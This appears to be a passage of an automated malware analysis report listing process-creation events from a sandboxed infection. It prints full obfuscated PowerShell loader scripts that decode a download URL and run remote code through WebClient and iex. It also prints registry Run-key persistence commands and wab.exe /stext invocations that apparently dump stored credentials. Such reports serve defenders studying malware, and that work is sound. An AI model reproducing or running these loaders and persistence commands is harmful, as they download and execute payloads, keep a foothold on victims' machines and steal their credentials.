KontFSkaniPertrUpcre Kiaf ValoNdrixLavr/Konv1Floc2Scou1Appl.,ont0Stru ';$improvers=Teucrium 'ArbeUDoubsTaleePianrTarv-,rogATwitgSclae P.lnte stKlas ';$Ovariectomize=Teucrium 'A rthSemit MastSuffpDykksNonp: Saa/Nedj/OrtoeGensu Lymrjyd.oPimepBegirNgomoF,rst Jere,agncanstt FidiSocieVir,. T sr.fproCh.r/GlasMTri,e CiktArb,hmargiSemin AaskNice1phle. TaktNonrhKdlsnOver ';$Astor=Teucrium 'Nonf> nd ';$Bestandigst=Teucrium ' PleiL.doeSp,lxSkit ';$Executry203='smittefaren';Regulerbare (Teucrium 'pugiSTecoePelstDeta-ventCFl.loDelinInddtPrepeTilbnFreet Taa Lill-Ex.ePBehea.psot Ab hPeri RakeT K,o:Gemm\AdjuNTartvBossn oce MatlTemps,obbeeu,o. FortEpipxEsthtBifr Whis-GarbV RefaTor lUndeuBoreeHyl Pier$BlysE remxRe.peBigacDionuBnsktNonsr A,kyDoci2Nedv0Term3r,ma; Men ');Regulerbare (Teucrium 'Untri Ov.fHaem Sal,(Tudbt Brue Kunsapp tZebr- alpNo sa .irt O qh Bi NoneTGerm:Ecot\Re pNdor v Ston Mone AcelToilsAgroeAfsk.Tre.tFro x DeptHjlp)Euph{QuiceAfsyxKvadiTe.rtSqui}M,le;Mi.l ');$Teariness = Teucrium 'FrereDynecScrahimp.o Gid brul%.ddea,uffp Hi pFilhdMadnaNi,at Ma,aSkum%Ha g\BeavPOv rr NoleDiscs Mani iklgDiagnPappa t,slVed 2Shir3Bu g.syndH,alla Konl Uni Fl,&Pose&Eate BylieBillcAfhohPanto Kns Ve s$tota ';Regulerbare (Teucrium 'P.lu$C.shgMa,tlAbonoEnthbAspeaUsorlK ap:Fores Timu Av,bAn ri Alinram,sOprre FrerConjtSpariUn coCronnKass= Tek(Sprnc KremDertdM.lj Felt/ HaycMerc Over$romeT ,rleLeveaScrur Pa.i MisnKalde orrsRaglsBewh)Wamu ');Regulerbare (Teucrium 'Sku,$HavigAcrolD.inoVipebLmlea banlM rk: EarTDiobaWeevaUdbyl Ly mAffao F,rdB,rti C,ag Spkh Udse.ndbdAmin= Con$ tevOCarov.atra OdorPolyiRepreOvercTordtSor.oStorm acciBe,nzSamdeBybu.Mil,srek.pr onlDhoti usttLivs(afsk$ .obA RegsBrantDivioGeinrD.mo)A.me ');$Ovariectomize=$Taalmodighed[0];Regulerbare (Teucrium ' bra$ lobg MallT.lfoT rbbAfh.aSenelS,co:Pos D IderBerbiMetof A itlinesGimbp ProrGlewoEumeb Kval Skaedispm U seSkrur PensNois=.kvaND ugePaliw Vul- HarO egabArmojFlereAldrc F.rtCy e Man SUna yN nssBkketTabeeF,rgmHakk.Dis.N Exte BritBar,.BrieWEthieFan,bEfteCSaltlManni.lideBrnenBaa,t Tem ');Regulerbare (Teucrium 'foli$ rusDPleorAmtsiKlokfovertA sesRolap Te.rCil.oUdlubCretlG,beeI
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Presignal23.Hal && echo $"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$gdnings = 1;$Tripetalous='S';$Tripetalous+='ubstrin';$Tripetalous+='g';Function Teucrium($Gdskes){$Expirable=$Gdskes.Length-$gdnings;For($Heltemodiges=4; $Heltemodiges -lt $Expirable; $Heltemodiges+=(5)){$Mirakeldoktorerne+=$Gdskes.$Tripetalous.Invoke($Heltemodiges, $gdnings);}$Mirakeldoktorerne;}function Regulerbare($Reticularia){& ($Bestandigst) ($Reticularia);}$Planlggelserne235=Teucrium 'LeopMC,mpo Croz FreiPrpol.hrilM rgaBri /Pree5 C r. Hex0Pl n Embr( ha,W Po iHemon.lgndPreeo eksw,olisSttt ,ppNupt T Yie Red1ud.i0 Mul.Fodb0 Ska; Skr AssuWByttiOvernSe.s6.oti4El.x; Tre DepexWhis6U mo4 De,;Vsk, Alir,entv Stt:.aus1,esu2 Pic1Fagb.Cryp0 M t)W.tc D.lgGOpree npcTrickStigoSkgg/,jle2 Kry0 Me 1S lt0Stoc0Cruo1Frkk0Sahu1Skru KontFSkaniPertrUpcre Kiaf ValoNdrixLavr/Konv1Floc2Scou1Appl.,ont0Stru ';$improvers=Teucrium 'ArbeUDoubsTaleePianrTarv-,rogATwitgSclae P.lnte stKlas ';$Ovariectomize=Teucrium 'A rthSemit MastSuffpDykksNonp: Saa/Nedj/OrtoeGensu Lymrjyd.oPimepBegirNgomoF,rst Jere,agncanstt FidiSocieVir,. T sr.fproCh.r/GlasMTri,e CiktArb,hmargiSemin AaskNice1phle. TaktNonrhKdlsnOver ';$Astor=Teucrium 'Nonf> nd ';$Bestandigst=Teucrium ' PleiL.doeSp,lxSkit ';$Executry203='smittefaren';Regulerbare (Teucrium 'pugiSTecoePelstDeta-ventCFl.loDelinInddtPrepeTilbnFreet Taa Lill-Ex.ePBehea.psot Ab hPeri RakeT K,o:Gemm\AdjuNTartvBossn oce MatlTemps,obbeeu,o. FortEpipxEsthtBifr Whis-GarbV RefaTor lUndeuBoreeHyl Pier$BlysE remxRe.peBigacDionuBnsktNonsr A,kyDoci2Nedv0Term3r,ma; Men ');Regulerbare (Teucrium 'Untri Ov.fHaem Sal,(Tudbt Brue Kunsapp tZebr- alpNo sa .irt O qh Bi NoneTGerm:Ecot\Re pNdor v Ston Mone AcelToilsAgroeAfsk.Tre.tFro x DeptHjlp)Euph{QuiceAfsyxKvadiTe.rtSqui}M,le;Mi.l ');$Teariness = Teucrium 'FrereDynecScrahimp.o Gid brul%.ddea,uffp Hi pFilhdMadnaNi,at Ma,aSkum%Ha g\BeavPOv rr NoleDiscs Mani iklgDiagnPappa t,slVed 2Shir3Bu g.syndH,alla Konl Uni Fl,&Pose&Eate BylieBillcAfhohPanto Kns Ve s$tota ';Regulerbare (Teucrium 'P.lu$C.shgMa,tlAbonoEnthbAspeaUsorlK ap:Fores Timu Av,bAn ri Alinram,sOprre FrerConjtSpariUn coCronnKass= Tek(Sprnc KremDertdM.lj Felt/ HaycMerc Over$romeT ,rleLeveaScrur Pa.i MisnKalde orrsRaglsBewh)Wamu ');Regulerbare (Teucrium 'Sku,$HavigAcrolD.inoVipebLmlea banlM rk: EarTDiobaWeevaUdbyl Ly mAffao F,rdB,rti C,ag Spkh Udse.ndbdAmin= Con$ tevOCarov.atra OdorPolyiRepreOvercTordtSor.oStorm acciBe,nzSamdeBybu.Mil,srek.pr onlDhoti usttLivs(afsk$ .obA RegsBrantDivioGeinrD.mo)A.me ');$Ovariectomize=$Taalmodighed[0];Regulerbare (Teucrium ' bra$ lobg MallT.lfoT rbbAfh.aSenelS,co:Pos D IderBerbiMetof A itlinesGimbp ProrGlewoEumeb Kval Skaedispm U seSkrur PensNois=.kvaND ugePaliw Vul- HarO egabArmojFlereAldrc F.rtCy e Man SUna yN nssBkketTabeeF,rgmHakk.Dis.N Exte BritBar,.BrieWEthieFan,bEfteCSaltlManni.lideBrnenBaa,t Tem ');Regulerbare (Teucrium 'foli$ rusDPleorAmtsiKlokfovertA sesRolap Te.rCil.oUdlubCretlG,beeI
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Presignal23.Hal && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Vibeka" /t REG_EXPAND_SZ /d "%Pneumatorrhachis% -w 1 $Salpeterholdiges=(Get-ItemProperty -Path 'HKCU:\Quicker\').Savvy;%Pneumatorrhachis% ($Salpeterholdiges)"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Vibeka" /t REG_EXPAND_SZ /d "%Pneumatorrhachis% -w 1 $Salpeterholdiges=(Get-ItemProperty -Path 'HKCU:\Quicker\').Savvy;%Pneumatorrhachis% ($Salpeterholdiges)"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Sydstligstes.vbs"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Raakolde = 1;$Fornrmet='S';$Fornrmet+='ubstrin';$Fornrmet+='g';Function Circumflexes($Cumulet){$Semimonarchically=$Cumulet.Length-$Raakolde;For($Habitually=4; $Habitually -lt $Semimonarchically; $Habitually+=(5)){$Wenzel+=$Cumulet.$Fornrmet.Invoke($Habitually, $Raakolde);}$Wenzel;}function Jettes($trendy){&($Indbagendes) ($trendy);}$Simultansceners=Circumflexes 'Ark,MMervoAn.czVampiT lel ElelBlreaSy.o/Jagt5 ve.Seac0T,sp Ryg.( KrmW.urdiRiitn s rdPi do.orhwAllosHjem G,oN PraT.oli ,eg1Inte0Remb.Spra0Anal;Duct Ret.WVagtiAtomnskyt6Aced4 Non;Falc F.glx.art6Pseu4.icr;Rovf MilrGramvNert:Nara1H,lg2Rive1Unde.Sopr0Pres)Vrd. P.slG,ndeeCubacSkinkTilloOffp/Slib2Pl r0Ned,1Appe0Onyc0Ven,1 enn0Trfi1 Bre V deFMickiKonsr traeA.trf dr oQrscxSamm/Moor1Hard2 ,or1Werf.,yde0.uto ';$Optrins45=Circumflexes 'tidsUI.prsP,yceSkabrover-StemAUkeng,ondeLivinE,tetHera ';$Levemulighed=Circumflexes 'B,slhG,ldt MentInflpKo,m:Conf/Ke,d/,ndf8Ago.7 bal.Pige1Cann2.ejl1 Fer.,rol1Diet0Nona5 Ske..ata1 Bl,6Ex.e3Kast/SrmrD Kile Ne.tSkreeIndmn rot MyxiBe aoKonknConse BoynDesi.s,rtj.attaDissv toda Non ';$Cose=Circumflexes 'Skor>Undi ';$Indbagendes=Circumflexes 'Dm,niMilieSelsx Bar ';$Nutritionary133='Paakldtes';Jettes (Circumflexes 'Ch dSSonaeAutotAlda-UnmyC.rocoValgn,annt Ende.enin S.dtO er Can- NobP ixta Fo.tBindhMe.k VrdiTSorg:Baga\Pt.rFbureoPot,rOutshTot,j S.iuretrlillesFletbTikmr GabeSmaamRadesAmoreT ivs.lbn.MargtAircx iltSaut Pote-La dVKinea Boll SafuEncaeDiap ,npr$CausN IlluDiglt Tndr,nbriKon,tBra,iUn.koDegenSpydaTricr egnyKrim1K.ip3Erem3L.eb; Bri ');Jettes (Circumflexes 'Tr.ni.inkfHoo. Skil(Indit AroeUndesuafmtEpit-DrukpFareaSkibtDuplhAfid silTRuck:None\Sla,F Sgeo Bu,rTec.hobsejAp.puQuanlBloks ostbs,mmrP osePal.mSocisCudbe Pics A,m.Te rtBre,xDigit ,fl),era{Giske andxRe aiNacrtCham}Pg.e;Ergo ');$Ballplayers248 = Circumflexes ' nkeSpikc Udmhsiego lgu Eksp%S,paaBagepTaktpOtopdElemaimpetarchaTran%She,\ParaATrignKolltHo,eiangulSkrmltr.ke Anpa JounChr,1Umed4 C.s4Sur...lumGVilkrBel.oJe n Ef e&sa,m&D.ge UpfieBil cUnnah KreoN,np Ci.i$ Kri ';Jettes (Circumflexes 'Real$,eclgFalsl.nifoAxi,bWolfaAfselCoin:SgesFScrso vrmrBrbaaBronn kkek Tabr,obbiGre nResig Kr,s oltpOveruCafenOverksol t KureBagnt Bits .ps=Abd.(dab,cSju.mEl md ,in Ferr/Calcc Ch, F rs$BedrBPi radra,lSna lurfjpMarklDialaIrr.yIndve R,trSeiss Puz2Duct4Ba.h8Phot)Dri ');Jettes (Circumflexes 'Ha.l$SlvsgEftel nfoSt,ibM.inaTabplTick: SpeA MoklEctovSubte UneoRegilSndaiErodtDispemdresTol =Lnn,$MyndLRaskeSkilv W.veForbmStrauf rflGauki.azigYemehPreee TradDole.RegesEft.p Ci.lIndaiVar.tVa,e(Sume$EnheCFormo.dves Pree G.n)Spil ');$Levemulighed=$Alveolites[0];Jettes (Circumflexes 'Anbr$.addgU.trl ,taoim ebTa.ba.alclB,nk:BestS.orkk GibeM,aspJotatS yti ,uncCoa,=partNDagbe KecwUrok-,lafOwainb ejljSkrseUns.curo.t.onc B anSSvalyVands igmtM.sceJug mSoap.FascNPhyleFre,t iga..oncWHetee Cikb istCDeralkin iSporeMetanMapptF er ');Jet
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\eeubmxzcykpvacklrogamlalknwo"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\oyatnpkwmshzkiypaztbxymclbnxnmdl"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\oyatnpkwmshzkiypaztbxymclbnxnmdl"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\oyatnpkwmshzkiypaztbxymclbnxnmdl"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\zbfe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Antillean144.Gro && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Raakolde = 1;$Fornrmet='S';$Fornrmet+='ubstrin';$Fornrmet+='g';Function Circumflexes($Cumulet){$Semimonarchically=$Cumulet.Length-$Raakolde;For($Habitually=4; $Habitually -lt $Semimonarchically; $Habitually+=(5)){$Wenzel+=$Cumulet.$Fornrmet.Invoke($Habitually, $Raakolde);}$Wenzel;}function Jettes($trendy){&($Indbagendes) ($trendy);}$Simultansceners=Circumflexes 'Ark,MMervoAn.czVampiT lel ElelBlreaSy.o/Jagt5 ve.Seac0T,sp Ryg.( KrmW.urdiRiitn s rdPi do.orhwAllosHjem G,oN PraT.oli ,eg1Inte0Remb.Spra0Anal;Duct Ret.WVagtiAtomnskyt6Aced4 Non;Falc F.glx.art6Pseu4.icr;Rovf MilrGramvNert:Nara1H,lg2Rive1Unde.Sopr0Pres)Vrd. P.slG,ndeeCubacSkinkTilloOffp/Slib2Pl r0Ned,1Appe0Onyc0Ven,1 enn0Trfi1 Bre V deFMickiKonsr traeA.trf dr oQrscxSamm/Moor1Hard2 ,or1Werf.,yde0.uto ';$Optrins45=Circumflexes 'tidsUI.prsP,yceSkabrover-StemAUkeng,ondeLivinE,tetHera ';$Levemulighed=Circumflexes 'B,slhG,ldt MentInflpKo,m:Conf/Ke,d/,ndf8Ago.7 bal.Pige1Cann2.ejl1 Fer.,rol1Diet0Nona5 Ske..ata1 Bl,6Ex.e3Kast/SrmrD Kile Ne.tSkreeIndmn rot MyxiBe aoKonknConse BoynDesi.s,rtj.attaDissv toda Non ';$Cose=Circumflexes 'Skor>Undi ';$Indbagendes=Circumflexes 'Dm,niMilieSelsx Bar ';$Nutritionary133='Paakldtes';Jettes (Circumflexes 'Ch dSSonaeAutotAlda-UnmyC.rocoValgn,annt Ende.enin S.dtO er Can- NobP ixta Fo.tBindhMe.k VrdiTSorg:Baga\Pt.rFbureoPot,rOutshTot,j S.iuretrlillesFletbTikmr GabeSmaamRadesAmoreT ivs.lbn.MargtAircx iltSaut Pote-La dVKinea Boll SafuEncaeDiap ,npr$CausN IlluDiglt Tndr,nbriKon,tBra,iUn.koDegenSpydaTricr egnyKrim1K.ip3Erem3L.eb; Bri ');Jettes (Circumflexes 'Tr.ni.inkfHoo. Skil(Indit AroeUndesuafmtEpit-DrukpFareaSkibtDuplhAfid silTRuck:None\Sla,F Sgeo Bu,rTec.hobsejAp.puQuanlBloks ostbs,mmrP osePal.mSocisCudbe Pics A,m.Te rtBre,xDigit ,fl),era{Giske andxRe aiNacrtCham}Pg.e;Ergo ');$Ballplayers248 = Circumflexes ' nkeSpikc Udmhsiego lgu Eksp%S,paaBagepTaktpOtopdElemaimpetarchaTran%She,\ParaATrignKolltHo,eiangulSkrmltr.ke Anpa JounChr,1Umed4 C.s4Sur...lumGVilkrBel.oJe n Ef e&sa,m&D.ge UpfieBil cUnnah KreoN,np Ci.i$ Kri ';Jettes (Circumflexes 'Real$,eclgFalsl.nifoAxi,bWolfaAfselCoin:SgesFScrso vrmrBrbaaBronn kkek Tabr,obbiGre nResig Kr,s oltpOveruCafenOverksol t KureBagnt Bits .ps=Abd.(dab,cSju.mEl md ,in Ferr/Calcc Ch, F rs$BedrBPi radra,lSna lurfjpMarklDialaIrr.yIndve R,trSeiss Puz2Duct4Ba.h8Phot)Dri ');Jettes (Circumflexes 'Ha.l$SlvsgEftel nfoSt,ibM.inaTabplTick: SpeA MoklEctovSubte UneoRegilSndaiErodtDispemdresTol =Lnn,$MyndLRaskeSkilv W.veForbmStrauf rflGauki.azigYemehPreee TradDole.RegesEft.p Ci.lIndaiVar.tVa,e(Sume$EnheCFormo.dves Pree G.n)Spil ');$Levemulighed=$Alveolites[0];Jettes (Circumflexes 'Anbr$.addgU.trl ,taoim ebTa.ba.alclB,nk:BestS.orkk GibeM,aspJotatS yti ,uncCoa,=partNDagbe KecwUrok-,lafOwainb ejljSkrseUns.curo.t.onc B anSSvalyVands igmtM.sceJug mSoap.FascNPhyleFre,t iga..oncWHetee Cikb istCDeralkin iSporeMetanMapptF er ');Jet
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Antillean144.Gro && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "bynkefugls" /t REG_EXPAND_SZ /d "%Deciduate% -w 1 $Xdiv=(Get-ItemProperty -Path 'HKCU:\Clouters\').Slapperne;%Deciduate% ($Xdiv)"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "bynkefugls" /t REG_EXPAND_SZ /d "%Deciduate% -w 1 $Xdiv=(Get-ItemProperty -Path 'HKCU:\Clouters\').Slapperne;%Deciduate% ($Xdiv)"
Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe Process created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"
Source: unknown Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: unknown Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: C:\Windows\SysWOW64\clip.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: unknown Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$gdnings = 1;$Tripetalous='S';$Tripetalous+='ubstrin';$Tripetalous+='g';Function Teucrium($Gdskes){$Expirable=$Gdskes.Length-$gdnings;For($Heltemodiges=4; $Heltemodiges -lt $Expirable; $Heltemodiges+=(5)){$Mirakeldoktorerne+=$Gdskes.$Tripetalous.Invoke($Heltemodiges, $gdnings);}$Mirakeldoktorerne;}function Regulerbare($Reticularia){& ($Bestandigst) ($Reticularia);}$Planlggelserne235=Teucrium 'LeopMC,mpo Croz FreiPrpol.hrilM rgaBri /Pree5 C r. Hex0Pl n Embr( ha,W Po iHemon.lgndPreeo eksw,olisSttt ,ppNupt T Yie Red1ud.i0 Mul.Fodb0 Ska; Skr AssuWByttiOvernSe.s6.oti4El.x; Tre DepexWhis6U mo4 De,;Vsk, Alir,entv Stt:.aus1,esu2 Pic1Fagb.Cryp0 M t)W.tc D.lgGOpree npcTrickStigoSkgg/,jle2 Kry0 Me 1S lt0Stoc0Cruo1Frkk0Sahu1Skru KontFSkaniPertrUpcre Kiaf ValoNdrixLavr/Konv1Floc2Scou1Appl.,ont0Stru ';$improvers=Teucrium 'ArbeUDoubsTaleePianrTarv-,rogATwitgSclae P.lnte stKlas ';$Ovariectomize=Teucrium 'A rthSemit MastSuffpDykksNonp: Saa/Nedj/OrtoeGensu Lymrjyd.oPimepBegirNgomoF,rst Jere,agncanstt FidiSocieVir,. T sr.fproCh.r/GlasMTri,e CiktArb,hmargiSemin AaskNice1phle. TaktNonrhKdlsnOver ';$Astor=Teucrium 'Nonf> nd ';$Bestandigst=Teucrium ' PleiL.doeSp,lxSkit ';$Executry203='smittefaren';Regulerbare (Teucrium 'pugiSTecoePelstDeta-ventCFl.loDelinInddtPrepeTilbnFreet Taa Lill-Ex.ePBehea.psot Ab hPeri RakeT K,o:Gemm\AdjuNTartvBossn oce MatlTemps,obbeeu,o. FortEpipxEsthtBifr Whis-GarbV RefaTor lUndeuBoreeHyl Pier$BlysE remxRe.peBigacDionuBnsktNonsr A,kyDoci2Nedv0Term3r,ma; Men ');Regulerbare (Teucrium 'Untri Ov.fHaem Sal,(Tudbt Brue Kunsapp tZebr- alpNo sa .irt O qh Bi NoneTGerm:Ecot\Re pNdor v Ston Mone AcelToilsAgroeAfsk.Tre.tFro x DeptHjlp)Euph{QuiceAfsyxKvadiTe.rtSqui}M,le;Mi.l ');$Teariness = Teucrium 'FrereDynecScrahimp.o Gid brul%.ddea,uffp Hi pFilhdMadnaNi,at Ma,aSkum%Ha g\BeavPOv rr NoleDiscs Mani iklgDiagnPappa t,slVed 2Shir3Bu g.syndH,alla Konl Uni Fl,&Pose&Eate BylieBillcAfhohPanto Kns Ve s$tota ';Regulerbare (Teucrium 'P.lu$C.shgMa,tlAbonoEnthbAspeaUsorlK ap:Fores Timu Av,bAn ri Alinram,sOprre FrerConjtSpariUn coCronnKass= Tek(Sprnc KremDertdM.lj Felt/ HaycMerc Over$romeT ,rleLeveaScrur Pa.i MisnKalde orrsRaglsBewh)Wamu ');Regulerbare (Teucrium 'Sku,$HavigAcrolD.inoVipebLmlea banlM rk: EarTDiobaWeevaUdbyl Ly mAffao F,rdB,rti C,ag Spkh Udse.ndbdAmin= Con$ tevOCarov.atra OdorPolyiRepreOvercTordtSor.oStorm acciBe,nzSamdeBybu.Mil,srek.pr onlDhoti usttLivs(afsk$ .obA RegsBrantDivioGeinrD.mo)A.me ');$Ovariectomize=$Taalmodighed[0];Regulerbare (Teucrium ' bra$ lobg MallT.lfoT rbbAfh.aSenelS,co:Pos D IderBerbiMetof A itlinesGimbp ProrGlewoEumeb Kval Skaedispm U seSkrur PensNois=.kvaND ugePaliw Vul- HarO egabArmojFlereAldrc F.rtCy e Man SUna yN nssBkketTabeeF,rgmHakk.Dis.N Exte BritBar,.BrieWEthieFan,bEfteCSaltlManni.lideBrnenBaa,t Tem ');Regulerbare (Teucrium 'foli$ rusDPleorAmtsiKlokfovertA sesRolap Te.rCil.oUdlubCretlG,beeI Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Presignal23.Hal && echo $" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$gdnings = 1;$Tripetalous='S';$Tripetalous+='ubstrin';$Tripetalous+='g';Function Teucrium($Gdskes){$Expirable=$Gdskes.Length-$gdnings;For($Heltemodiges=4; $Heltemodiges -lt $Expirable; $Heltemodiges+=(5)){$Mirakeldoktorerne+=$Gdskes.$Tripetalous.Invoke($Heltemodiges, $gdnings);}$Mirakeldoktorerne;}function Regulerbare($Reticularia){& ($Bestandigst) ($Reticularia);}$Planlggelserne235=Teucrium 'LeopMC,mpo Croz FreiPrpol.hrilM rgaBri /Pree5 C r. Hex0Pl n Embr( ha,W Po iHemon.lgndPreeo eksw,olisSttt ,ppNupt T Yie Red1ud.i0 Mul.Fodb0 Ska; Skr AssuWByttiOvernSe.s6.oti4El.x; Tre DepexWhis6U mo4 De,;Vsk, Alir,entv Stt:.aus1,esu2 Pic1Fagb.Cryp0 M t)W.tc D.lgGOpree npcTrickStigoSkgg/,jle2 Kry0 Me 1S lt0Stoc0Cruo1Frkk0Sahu1Skru KontFSkaniPertrUpcre Kiaf ValoNdrixLavr/Konv1Floc2Scou1Appl.,ont0Stru ';$improvers=Teucrium 'ArbeUDoubsTaleePianrTarv-,rogATwitgSclae P.lnte stKlas ';$Ovariectomize=Teucrium 'A rthSemit MastSuffpDykksNonp: Saa/Nedj/OrtoeGensu Lymrjyd.oPimepBegirNgomoF,rst Jere,agncanstt FidiSocieVir,. T sr.fproCh.r/GlasMTri,e CiktArb,hmargiSemin AaskNice1phle. TaktNonrhKdlsnOver ';$Astor=Teucrium 'Nonf> nd ';$Bestandigst=Teucrium ' PleiL.doeSp,lxSkit ';$Executry203='smittefaren';Regulerbare (Teucrium 'pugiSTecoePelstDeta-ventCFl.loDelinInddtPrepeTilbnFreet Taa Lill-Ex.ePBehea.psot Ab hPeri RakeT K,o:Gemm\AdjuNTartvBossn oce MatlTemps,obbeeu,o. FortEpipxEsthtBifr Whis-GarbV RefaTor lUndeuBoreeHyl Pier$BlysE remxRe.peBigacDionuBnsktNonsr A,kyDoci2Nedv0Term3r,ma; Men ');Regulerbare (Teucrium 'Untri Ov.fHaem Sal,(Tudbt Brue Kunsapp tZebr- alpNo sa .irt O qh Bi NoneTGerm:Ecot\Re pNdor v Ston Mone AcelToilsAgroeAfsk.Tre.tFro x DeptHjlp)Euph{QuiceAfsyxKvadiTe.rtSqui}M,le;Mi.l ');$Teariness = Teucrium 'FrereDynecScrahimp.o Gid brul%.ddea,uffp Hi pFilhdMadnaNi,at Ma,aSkum%Ha g\BeavPOv rr NoleDiscs Mani iklgDiagnPappa t,slVed 2Shir3Bu g.syndH,alla Konl Uni Fl,&Pose&Eate BylieBillcAfhohPanto Kns Ve s$tota ';Regulerbare (Teucrium 'P.lu$C.shgMa,tlAbonoEnthbAspeaUsorlK ap:Fores Timu Av,bAn ri Alinram,sOprre FrerConjtSpariUn coCronnKass= Tek(Sprnc KremDertdM.lj Felt/ HaycMerc Over$romeT ,rleLeveaScrur Pa.i MisnKalde orrsRaglsBewh)Wamu ');Regulerbare (Teucrium 'Sku,$HavigAcrolD.inoVipebLmlea banlM rk: EarTDiobaWeevaUdbyl Ly mAffao F,rdB,rti C,ag Spkh Udse.ndbdAmin= Con$ tevOCarov.atra OdorPolyiRepreOvercTordtSor.oStorm acciBe,nzSamdeBybu.Mil,srek.pr onlDhoti usttLivs(afsk$ .obA RegsBrantDivioGeinrD.mo)A.me ');$Ovariectomize=$Taalmodighed[0];Regulerbare (Teucrium ' bra$ lobg MallT.lfoT rbbAfh.aSenelS,co:Pos D IderBerbiMetof A itlinesGimbp ProrGlewoEumeb Kval Skaedispm U seSkrur 